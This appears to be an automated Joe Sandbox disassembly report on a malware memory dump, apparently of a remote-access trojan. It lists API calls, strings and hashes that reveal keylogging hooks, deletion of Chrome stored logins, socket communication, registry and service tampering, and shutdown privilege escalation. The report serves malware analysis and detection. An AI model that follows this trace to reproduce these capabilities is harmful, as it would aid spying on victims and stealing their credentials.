                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                                                                                • String ID: <D$<D$<D
                                                                                                                                                                                                                                                                                                • API String ID: 745075371-3495170934
                                                                                                                                                                                                                                                                                                • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                                                                                                                                • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                                                                                                                                                                                                • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                                                                                                                                                • String ID: Keylogger initialization failure: error $`#v
                                                                                                                                                                                                                                                                                                • API String ID: 3219506041-3226811161
                                                                                                                                                                                                                                                                                                • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                                                                                                                                                                                                                                                                • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2341273852-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                                                                                                                                                                                                                                                                • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$Find$CreateFirstNext
                                                                                                                                                                                                                                                                                                • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                                                                                                                                                                                                                • API String ID: 341183262-3780268858
                                                                                                                                                                                                                                                                                                • Opcode ID: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                                                                                                                                                                                                                                                                • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                                                                                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                                                                                                                                                • API String ID: 2127411465-314212984
                                                                                                                                                                                                                                                                                                • Opcode ID: 4bfa0ab92cfe4c7e273a593f9c438f6144fcaff52e32c91ef8c2f101195a9e69
                                                                                                                                                                                                                                                                                                • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bfa0ab92cfe4c7e273a593f9c438f6144fcaff52e32c91ef8c2f101195a9e69
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                                                                                                                                • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                                                                                                                                                                                                • API String ID: 2281282204-3981147832
                                                                                                                                                                                                                                                                                                • Opcode ID: e7420bd81adcf7ecaeb63c441a7eb2a496d40f418d65372005f5d4e07d0bafb2
                                                                                                                                                                                                                                                                                                • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7420bd81adcf7ecaeb63c441a7eb2a496d40f418d65372005f5d4e07d0bafb2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                                                                                                                                                                                                • UserProfile, xrefs: 0040B227
                                                                                                                                                                                                                                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                                                                                                                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                                                                                                                                                • API String ID: 2018770650-1062637481
                                                                                                                                                                                                                                                                                                • Opcode ID: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                                                                                                                                                                                                                                                                • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                • API String ID: 3534403312-3733053543
                                                                                                                                                                                                                                                                                                • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                                                                                                                                • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4043647387-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                                                                                                                                                                                                                                                                • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                                                                                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                                                                                                                                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 276877138-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                                                                                                                                                                                                                • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                                                                                                                                                • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                                                                                • API String ID: 1589313981-1420736420
                                                                                                                                                                                                                                                                                                • Opcode ID: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                                                                                                                                                                                                                                                                • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                                                                                                                                                                                                                                • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                                • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                                                                                                                                • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                                                                                • String ID: SETTINGS
                                                                                                                                                                                                                                                                                                • API String ID: 3473537107-594951305
                                                                                                                                                                                                                                                                                                • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                                                                                                                                • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1157919129-0
                                                                                                                                                                                                                                                                                                • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                                                                                                                                                                                                                                • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00448067
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
